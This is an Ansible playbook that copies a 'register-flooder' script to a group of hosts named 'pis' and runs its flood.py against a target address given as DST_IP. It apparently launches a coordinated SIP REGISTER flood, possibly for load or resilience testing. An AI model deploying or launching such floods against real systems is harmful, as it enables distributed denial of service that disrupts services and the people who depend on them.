---
- hosts: pis
  tasks:
    - name: Copy python script to client
      copy:
        src: register-flooder
        dest: /root/
        mode: 0644
    - name: Run REGISTER-Flood
      shell: python3 /root/register-flooder/flood.py {{DST_IP}}
